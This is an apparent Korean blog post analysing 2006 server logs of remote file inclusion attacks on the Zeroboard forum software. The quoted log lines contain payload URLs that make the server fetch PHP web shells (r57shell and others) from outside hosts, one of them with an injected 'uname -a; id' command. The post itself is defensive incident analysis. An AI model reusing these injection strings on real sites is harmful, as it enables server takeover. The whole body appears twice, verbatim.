아래의 제로보드 취약점 공격 도구와는 또 약간 다른 제로보드 보안 취약점 공격 도구의 로그 입니다.
201.32.179.176 - - [02/Sep/2006:10:50:33 +0900] "GET /bbs/upload/1/2004122413021
8/zboard2.pdf#search=http://salim.no.sapo.pt/shell.txt? HTTP/1.1" 404 0 "" "Mozi
lla/3.0 (compatible; Indy Library)"
공격자 IP인 201.32.179.176 는 whois 정보를 보면 Telemar Norte Leste S.A. 로 되어 있는데, whois 결과가 일반적인 결과와 다르게 좀 특이하네요. 브라질의 TelCo 인 듯 한데... PDF 문서를 검색하는 방식인 #search=http://http://salim.no.sapo.pt/shell.txt? 로 공격을 시도하고 있습니다.
shell.txt 는 php 짜여진 웹쉘이고, 나름대로 웹쉘 내의 그래픽(거미문양)을 이쁘게 꾸미려고 많이 노력했네요. 이 툴은 예전에 많이 돌아다니던 r57shell.php 입니다.
웹 사이트를 공격하는 방식을 봐서 공격자가 세련되지는 못한 듯...
---
추가
위의 공격이 매우 성행하고 있다.
201.25.43.119 - - [02/Sep/2006:22:59:15 +0900] "GET /bbs/upload/1/20041224130218/zboard2.pdf#search=http://extremus.info/cmd/tool25.dat?&chdir= HTTP/1.1" 404 0 "" "Mozilla/3.0 (compatible; Indy Library)"
201.9.19.105 - - [03/Sep/2006:11:03:32 +0900] "GET /bbs/upload/1/20041224130218/zboard2.pdf#search=http://geo.ya.com/z1x2c3v4/cmd.txt?&cmd=uname%20-a;%20id HTTP/1.1" 404 0 "" "Mozilla/3.0 (compatible; Indy Library)"
200.146.63.75 - - [03/Sep/2006:16:04:36 +0900] "GET /bbs/upload/1/20041224130218/zboard2.pdf#search=http://salim.no.sapo.pt/shell.txt? HTTP/1.0" 404 0 "" "Mozilla/3.0 (compatible; Indy Library)"
- 공격에 사용된 웹쉘 : deface.tgz
201.32.179.176 - - [02/Sep/2006:10:50:33 +0900] "GET /bbs/upload/1/2004122413021
8/zboard2.pdf#search=http://salim.no.sapo.pt/shell.txt? HTTP/1.1" 404 0 "" "Mozi
lla/3.0 (compatible; Indy Library)"
공격자 IP인 201.32.179.176 는 whois 정보를 보면 Telemar Norte Leste S.A. 로 되어 있는데, whois 결과가 일반적인 결과와 다르게 좀 특이하네요. 브라질의 TelCo 인 듯 한데... PDF 문서를 검색하는 방식인 #search=http://http://salim.no.sapo.pt/shell.txt? 로 공격을 시도하고 있습니다.
shell.txt 는 php 짜여진 웹쉘이고, 나름대로 웹쉘 내의 그래픽(거미문양)을 이쁘게 꾸미려고 많이 노력했네요. 이 툴은 예전에 많이 돌아다니던 r57shell.php 입니다.
웹 사이트를 공격하는 방식을 봐서 공격자가 세련되지는 못한 듯...
---
추가
위의 공격이 매우 성행하고 있다.
201.25.43.119 - - [02/Sep/2006:22:59:15 +0900] "GET /bbs/upload/1/20041224130218/zboard2.pdf#search=http://extremus.info/cmd/tool25.dat?&chdir= HTTP/1.1" 404 0 "" "Mozilla/3.0 (compatible; Indy Library)"
201.9.19.105 - - [03/Sep/2006:11:03:32 +0900] "GET /bbs/upload/1/20041224130218/zboard2.pdf#search=http://geo.ya.com/z1x2c3v4/cmd.txt?&cmd=uname%20-a;%20id HTTP/1.1" 404 0 "" "Mozilla/3.0 (compatible; Indy Library)"
200.146.63.75 - - [03/Sep/2006:16:04:36 +0900] "GET /bbs/upload/1/20041224130218/zboard2.pdf#search=http://salim.no.sapo.pt/shell.txt? HTTP/1.0" 404 0 "" "Mozilla/3.0 (compatible; Indy Library)"
- 공격에 사용된 웹쉘 : deface.tgz
덧글